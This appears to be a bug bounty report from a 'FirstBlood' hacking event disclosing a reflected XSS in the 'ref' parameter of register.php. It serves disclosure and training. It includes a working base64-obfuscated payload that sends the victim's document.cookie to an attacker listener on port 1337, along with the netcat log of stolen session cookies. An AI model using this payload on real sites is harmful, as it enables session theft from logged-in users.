FirstBlood-#116Reflective XSS at

On 2021-05-10, 0xconft reported:

Hi there,

I found Reflective XSS at via ref parameter and since doesn't have httponly flag at cookie header this xss can be used to steal cookie.

PoC alert. You must hover your mouse over the "return to previous page" banner

When doctor accessing this url while logged in at and hovering their mouse over the "return to previous page" banner the XSS will be executed and the cookie will be sent to attacker's server`dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCAnaHR0cDovLzE5Mi4xNjguMC4yMDoxMzM3Lz91PScrZG9jdW1lbnQuY29va2llKTt4aHIuc2VuZCgpOw`))%27

The cookie will be sent to attacker's server

$ nc -lvp 1337
Listening on 1337
Connection received on 56186
GET /?u=drps=3d0582d27073a87a4db320f57;%20doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Best Regards, 0xconft

P3 Medium

Endpoint: /register.php

Parameter: ?ref

Payload: x%27+onmousemove=%27eval(atob(`dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCAnaHR0cDovLzE5Mi4xNjguMC4yMDoxMzM3Lz91PScrZG9jdW1lbnQuY29va2llKTt4aHIuc2VuZCgpOw`))%27

FirstBlood ID: 4
Vulnerability Type: Reflective XSS

The parameter "ref" is vulnerable to XSS on register.php. The developer made use of htmlentities but this is inadequate as the HREF is wrapped in single quotes.

Report Feedback


Creator & Administrator

Great finding, even though this is a dupe, i'm awarding a bounty at my discretion

Respect Earnt: 2000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.